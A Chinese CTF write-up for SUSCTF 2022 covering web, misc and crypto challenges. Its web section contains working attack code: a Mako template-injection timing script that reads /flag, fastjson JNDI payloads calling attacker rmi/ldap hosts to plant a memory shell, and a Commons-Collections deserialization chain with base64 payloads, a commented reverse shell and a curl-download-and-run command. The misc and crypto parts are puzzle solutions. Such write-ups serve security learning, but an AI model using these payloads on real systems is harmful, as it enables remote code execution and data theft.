2022 SUSCTF Writeup
2022-3-5 09:30:0 Author: mp.weixin.qq.com(查看原文) 阅读量:139 收藏

文章来源 : EDI安全

01

Web

1

html

mako ssti 不出⽹盲注

% for i in range(0,self.module.runtime.util.os.system(set(pageargs.values()).pop())):123% endfor123

当命令执⾏成功 则显示123 否则 显示多个123

import requestsimport stringimport urllib.parseurl="http://124.71.178.252/view/vnA8UID0QS7X2FtwsBTop15HNm6hfzbx.html?name="payload1="sleep $(cat /flag|base64 -w0|cut -c {}|tr {} 5)"payload1 ="""if [ $(printf "%d" "'$(cat /flag|cut -c {})") -eq {} ];then sleep 3;fi"""# payload2="if test $(cat /flag|cut -c {}) = {};then sleep 3;fi"s=string.ascii_letters+string.digits+'{@~^*_+-\'\"?/\\<>}'# s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"flag=''for i in range(7,100): f=flagfor j in range(48,128): try: u=url+urllib.parse.quote(payload1.format(str(i),j)) r=requests.get(u,timeout=1.8) except requests.exceptions.ReadTimeout as e: flag=flag+chr(j) print(chr(j)) break if f==flag: breakprint(flag)
断断续续跑n次

2

fxxkcors

下载xxxx https://www.notion.so

fxxkcorschallenge:http://124.71.205.122:10002/report:http://123.60.71.144:3000/fxxkcorshttp://159.138.56.26:3000/fxxkcorshttp://119.13.125.234:3000/fxxkcors

应该是要绕CORS 让BOT修改我的⽤户为admin Origin⽆效 没找到有xss 写 POST发json 让BOT打也没修改成功 我也不知道为啥。。。

BOT特征connect to [10.7.100.194] from ecs-119-13-125-234.compute.hwclouds-dns.com [119.13.125.234]37878GET / HTTP/1.1Host: 36.255.221.156:902Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)HeadlessChrome/99.0.4844.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US

找排行榜 解出题目的用户 密码123 蹭车出了

3

baby gadget v1.0

下载xxxx

baby gadget v1.0bypass and bypasshttp://124.71.187.127:20012/

bp绕过᯿定向 可以发现admin/download.jsp 下载下来是⼀个依赖包 fastjson。

⽬录扫描,访问到admin/路由 会⾃动᯿定向 弱密码登录 admin admin123 fastjson触发点。

POST /admin/mailbox.jsp HTTP/1.1Host: 124.71.187.127:20012User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 272Origin: http://124.71.187.127:20012Connection: closeReferer: http://124.71.187.127:20012/admin/mailbox.jsp?q=123123123Cookie: JSESSIONID=197ACA802BB2F2298D4CA7DDA7154D85Upgrade-Insecure-Requests: 1Origin: foo.example.orginputtext={ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.116.218.142:9999/Object", "autoCommit":true }}

写个内存⻢ 然后{cat,flag} 绕过rasp检测。

POST /admin/mailbox.jsp HTTP/1.1Host: 124.71.187.127:20012User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 294Origin: http://124.71.187.127:20013eConnection: closeReferer: http://124.71.187.127:20013/admin/mailbox.jsp?q=123123123Cookie: JSESSIONID=09C31AC61C1C265773A55D835D085415Upgrade-Insecure-Requests: 1Origin: foo.example.orginputtext={ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://1.116.218.142:1389/TomcatBypass/TomcatMemshell", "autoCommit":true }}

后续查看依赖

SUSCTF{Find_FastjSON_gadGet_is_so_Easy}

4

baby gadget v2.0

登录是个XML 猜测XXE 不符合xml标准爆出 Get out hacker! 提示了hint.txt 尝试dtd+⽆回显。

读取到hint,下载压缩包

有waf限制

http://124.71.189.248:20012/bf2dcf6664b16e0efe471b2eac2b54b2

body反序列化

使用其他Class绕过HashMap就可以了 poc如下

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import javassist.ClassPool;import org.apache.commons.collections.Bag;import org.apache.commons.collections.FastHashMap;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.bag.HashBag;import org.apache.commons.collections.bag.TransformedBag;import org.apache.commons.collections.bag.TransformedSortedBag;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InstantiateTransformer;import org.apache.commons.collections.keyvalue.TiedMapEntry;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections.map.LazyMap;import javax.xml.transform.Templates;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.*;/*** @author MoonBack* @date 2022/2/27 16:07*/public class susctf { public static void setFieldValue(Object obj, String fieldName, Object value) throwsException { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static void main(String[] args) throws Exception { TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{ ClassPool.getDefault().get(evil.class.getName()).toBytecode() }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; Transformer[] transformers = new Transformer[]{ new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[] { Templates.class }, new Object[] { obj }) }; Transformer chainedTransformer = new ChainedTransformer(fakeTransformers); Map hashMap = new TreeMap(); // 构造出恶意Map Map evilMap = LazyMap.decorate(hashMap, chainedTransformer); // ⽤恶意Map初始化TiedMapEntry TiedMapEntry tiedMapEntry = new TiedMapEntry(evilMap, "key"); // 将构造好的TiedMapEntry对象作为HashMap的⼀个key Map evalMap = new FastHashMap(); // put的时候会触发Mapkeyget⽅法,所以先构造⼀个⽆害的ChainedTransformer对象⽤来初始化,之后再⽤反射修改值 evalMap.put(tiedMapEntry, "123"); // 注意这⾥ evilMap.remove("key");反弹shell是失败的。。。所以先curl写⽂件 然后再执⾏它 通过curlflag带出来1 下载⽂件 // ⽤反射设置把恶意构造的Transformer Field declaredFields = ChainedTransformer.class.getDeclaredField("iTransformers"); // 设置权限 declaredFields.setAccessible(true); declaredFields.set(chainedTransformer, transformers); // ================== // ⽣成序列化字符串 ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); oos.writeObject(evalMap); oos.close(); System.out.println(new String(Base64.getEncoder().encode(barr.toByteArray()))); // 本地测试触发// System.out.println(barr);// ObjectInputStream ois = new SafeInputStream(newByteArrayInputStream(barr.toByteArray()));// Object o = (Object) ois.readObject(); }}

反弹shell是失败的。。。所以先curl写⽂件 然后再执⾏它 通过curl把flag带出来。

/*** @author MoonBack* @date 2021/12/15 15:00*/import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class evil extends AbstractTranslet { public void transform(DOM document, SerializationHandler[] handlers) throwsTransletException {} public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)throws TransletException {} public evil() throws Exception {// Runtime.getRuntime().exec("bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNi4yNTUuMjIxLjE1Ni85ODAxIDA+JjE=}|{base64,-d}|{bash,-i}");// Runtime.getRuntime().exec("curl -o /tmp/suanve http://36.255.221.156:901/1 "); Runtime.getRuntime().exec("bash /tmp/suanve");// Runtime.getRuntime().exec("calc"); }}

1、下载⽂件

POST /bf2dcf6664b16e0efe471b2eac2b54b2 HTTP/1.1Host: 124.71.189.248:20012User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1cmd: idOrigin: foo.example.orgContent-Type: application/x-www-form-urlencodedContent-Length: 3830rO0ABXNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuRmFzdEhhc2hNYXDPVCYVgxGIjgIAAloABGZhc3RMAANtYXB0ABNMamF2YS91dGlsL0hhc2hNYXA7eHIAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4AHNxAH4AAj9AAAAAAAAMdwgAAAAQAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2tleXNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAAAnNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB%2bAAZ4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2bkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2bAYIVOACAAB4cAAABXXK/rq%2bAAAANAAuCgAHAB8KACAAIQgAIgoAIAAjCAAkBwAlBwAmAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMZXZpbDsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ%2bAQADKClWBwAoAQAKU291cmNlRmlsZQEACWV2aWwuamF2YQwAGgAbBwApDAAqACsBADBjdXJsIC1vIC90bXAvc3VhbnZlIGh0dHA6Ly8zNi4yNTUuMjIxLjE1Njo5MDEvMSAMACwALQEAEGJhc2ggL3RtcC9zdWFudmUBAARldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAADAAEACAAJAAIACgAAAD8AAAADAAAAAbEAAAACAAsAAAAGAAEAAAAMAAwAAAAgAAMAAAABAA0ADgAAAAAAAQAPABAAAQAAAAEAEQASAAIAEwAAAAQAAQAUAAEACAAVAAIACgAAAEkAAAAEAAAAAbEAAAACAAsAAAAGAAEAAAAOAAwAAAAqAAQAAAABAA0ADgAAAAAAAQAPABAAAQAAAAEAFgAXAAIAAAABABgAGQADABMAAAAEAAEAFAABABoAGwACAAoAAABNAAIAAQAAABcqtwABuAACEgO2AARXuAACEgW2AARXsQAAAAIACwAAABIABAAAABAABAATAA0AFAAWABYADAAAAAwAAQAAABcADQAOAAAAEwAAAAQAAQAcAAEAHQAAAAIAHnB0ABJIZWxsb1RlbXBsYXRlc0ltcGxwdwEAeHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlcwAAAAAAAAAAAAAAeHBzcgARamF2YS51dGlsLlRyZWVNYXAMwfY%2bLSVq5gMAAUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHBwdwQAAAAAeHh0AAMxMjN4

2、执⾏⽂件

POST /bf2dcf6664b16e0efe471b2eac2b54b2 HTTP/1.1Host: 124.71.189.248:20012User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1cmd: idOrigin: foo.example.orgContent-Type: application/x-www-form-urlencodedContent-Length: 3742rO0ABXNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuRmFzdEhhc2hNYXDPVCYVgxGIjgIAAloABGZhc3RMAANtYXB0ABNMamF2YS91dGlsL0hhc2hNYXA7eHIAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4AHNxAH4AAj9AAAAAAAAMdwgAAAAQAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2tleXNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAAAnNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB%2bAAZ4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2bkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2bAYIVOACAAB4cAAABTLK/rq%2bAAAANAAsCgAGAB4KAB8AIAgAIQoAHwAiBwAjBwAkAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMZXZpbDsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ%2bAQADKClWBwAmAQAKU291cmNlRmlsZQEACWV2aWwuamF2YQwAGQAaBwAnDAAoACkBABBiYXNoIC90bXAvc3VhbnZlDAAqACsBAARldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAD8AAAADAAAAAbEAAAACAAoAAAAGAAEAAAAMAAsAAAAgAAMAAAABAAwADQAAAAAAAQAOAA8AAQAAAAEAEAARAAIAEgAAAAQAAQATAAEABwAUAAIACQAAAEkAAAAEAAAAAbEAAAACAAoAAAAGAAEAAAAOAAsAAAAqAAQAAAABAAwADQAAAAAAAQAOAA8AAQAAAAEAFQAWAAIAAAABABcAGAADABIAAAAEAAEAEwABABkAGgACAAkAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACgAAAA4AAwAAABAABAAUAA0AFgALAAAADAABAAAADgAMAA0AAAASAAAABAABABsAAQAcAAAAAgAdcHQAEkhlbGxvVGVtcGxhdGVzSW1wbHB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHNyABFqYXZhLnV0aWwuVHJlZU1hcAzB9j4tJWrmAwABTAAKY29tcGFyYXRvcnQAFkxqYXZhL3V0aWwvQ29tcGFyYXRvcjt4cHB3BAAAAAB4eHQAAzEyM3g%3d
反序列化

5

baby gadget v2.0' revenge

同上题

6

baby gadget v1.0's rrrevenge

fastjson变为1.2.48,其他没变,改⼀下

payload

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://xx.xx.xx.xx:7771/Exploit"}

成功访问类,但没有弹回来shell,跟着上题的思路,同样写个内存⻢ 

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://xx.xx.xx.xx:7771/SRain"}

抓⼀下flag

02

Misc

1

Tanner

下载附件得到一张图,就去查了查tanner看到是idpc码的一种转换图,

在一篇公众号文章中看到了一张图。

https://mp.weixin.qq.com/s?__biz=MzAwMDE1MDcxMQ==&mid=2247483798&idx=1&sn=7925f0a65f791e861d4d64b43362c1ec&chksm=9aec1c4ead9b955833da6a558eab18034996f3187d093efb99c83094569e172a87301918458e&mpshare=1&scene=23&srcid=0226KfbKS6Am7lu7Qu0z9LeM&sharer_sharetime=1645842796907&sharer_shareid=e5abdf5abd4339d3304760d38e03b2b7#rd

把H的矩阵提取出来,根据解密过程

https://leohope.com/%E8%A7%A3%E9%97%AE%E9%A2%98/2019/01/11/ldpc-with-python/
发现不知道y,在图片十六进制数据的尾部有看起来是把符合条件的二进制y全加起来。
脚本
#coding:utf-8import numpy as np#LDPC decode(hard decision)def decode(H,y,m,n,p): fr = np.zeros((m, 2 * p)) # check nodes received fs = np.zeros((m, 2 * p)) # check nodes send sum = np.zeros(m) # check nodes received sum(for parity check) # message nodes table # 前p列为校验节点发来的消息,第p+1列为原始消息,第p+2列作为游标 c=np.zeros((n,p+2)) y1=np.zeros(n) # Fill the check nodes received table for i in range(m): count=0 for j in range(n): if H[i][j] == 1: fr[i,count]=y[j] sum[i]=sum[i]+y[j] count = count+1 # Calculate the check nodes send tablefor i in range(m): for j in range(2*p): fs[i,j]=(sum[i]-fr[i,j])%2 # Fill the message node table for i in range(m): count=0 for j in range(n): if H[i][j]==1: index=int(c[j,p+1]) c[j,index]=fs[i,count] count = count+1 c[j,p+1]+=1 # Fill the last column with y for i in range(n): c[i, p] = y[i] # Decision for i in range(n): count=0 for j in range(p+1): if c[i,j] == 1: count+=1 if count > (p+1)/2: y1[i]=1 return y1m=5 # Number of rowsn=10 # Number of columnsp=2 # Number of 1s in a colomnH=np.zeros((5,10))y=''H=[[1,1,1,1,0,0,0,0,0,0],[1,0,0,0,1,1,1,0,0,0],[0,1,0,0,1,0,0,1,1,0],[0,0,1,0,0,1,0,1,0,1],[0,0,0,1,0,0,1,0,1,1]]sum = 0for i1 in range(0,2): for i2 in range(0, 2): for i3 in range(0, 2): for i4 in range(0, 2): for i5 in range(0, 2): for i6 in range(0, 2): for i7 in range(0, 2): for i8 in range(0, 2): for i9 in range(0, 2): for i10 in range(0, 2): if i1^i2^i3^i4==0 and i1^i5^i6^i7==0 and i2^i5^i8^i9==0and i3^i6^i8^i10==0 and i4^i7^i9^i10==0:y=str(i1)+str(i2)+str(i3)+str(i4)+str(i5)+str(i6)+str(i7)+str(i8)+str(i9)+str(i10)print(y)sum+=int(y,2)print(sum) #y1 = decode(H, y, m, n, p)#y = [x for x in map(int,y)]#y = [x for x in map(str,y)]#y1 = [x for x in map(int,y1)]#y1 = [x for x in map(str,y1)]#if ''.join(y) == ''.join(y1):# print(y1,y)

输出32736进行二进制转换后再sha256,全小写

2

miscsound

首先听音频用rwsstv扫竟然没啥信息,貌似是坏了

用Audacity打开频谱,放大后可看到字母,提取出来

AnEWmuLTiPLyis_etimes_wiLLbEcomE_B

且这串英文字符是一串hint也是密文

(![)6I3TIVVFCYHKMIKN(Z2.png6I3TIVVFCYHKMIKN(Z2.png)

使用silenteye找到一串base64

这个即为上文的e(

写脚本推测规律即可

c='AnEWmuLTiPLyis_etimes_wiLLbEcomE_B'e=[207,359,220,224,352,315,359,374,290,310,277,507,391,513,423,392,508,383,440,322,420,427,503,460,295,318,245,302,407,414,410,130,369,317]tmp=''#print((ord('e')*ord('_')-1)/369)#(26*e+1)/cfor i in range(len(c)):    tmp+=chr(round((e[i]*26+1)/ ord(c[i])))print(tmp)#flag为SUSCTF{tHe_matter_iS_unremArkab1e}

3

ra2

玩游戏

建造围墙建造之后就可以派士兵去探视野找到一个告示牌告示牌里面动态显示flag。

4

AUDIO

两段音频导入au,fromfriends的音频中有莫斯密码,而另一段没有,所以使用au将其消除

新建多轨会话,伴奏轨道用·反相效果

调整伴奏轨道音量使其消除,直到能清晰地听清莫斯密码

5

checkin

给bot发信息然后截图手敲一下

03

Crypto

1

large case

e是各p-1,q-1,r-1中的一个素因子的乘积

p=127846753573603084140032502367311687577517286192893830888210505400863747960458410091624928485398237221748639465569360357083610343901195273740653100259873512668015324620239720302434418836556626441491996755736644886234427063508445212117628827393696641594389475794455769831224080974098671804484986257952189021223q=145855456487495382044171198958191111759614682359121667762539436558951453420409098978730659224765186993202647878416602503196995715156477020462357271957894750950465766809623184979464111968346235929375202282811814079958258215558862385475337911665725569669510022344713444067774094112542265293776098223712339100693r=165967627827619421909025667485886197280531070386062799707570138462960892786375448755168117226002965841166040777799690060003514218907279202146293715568618421507166624010447447835500614000601643150187327886055136468260391127675012777934049855029499330117864969171026445847229725440665179150874362143944727374907c=28327755574874188166634946458490970669259677997548959798297844990404373854506035377328625764957582072406327342909479282919610636118978226889094475112606394293677684793785995327126217749187333048572470997140446156918779955341738493023536203998964556154740935816737742977300569756637926517438095143203791897482281868123621127536880731613756905088183567127397954927367439941054385757365771943297513721423293066309508630977616011968491582805020416165454295868707510429083655070507173852053716716587063576694088131126102157661597619271966394049512515356223499168772969567678831656969479553798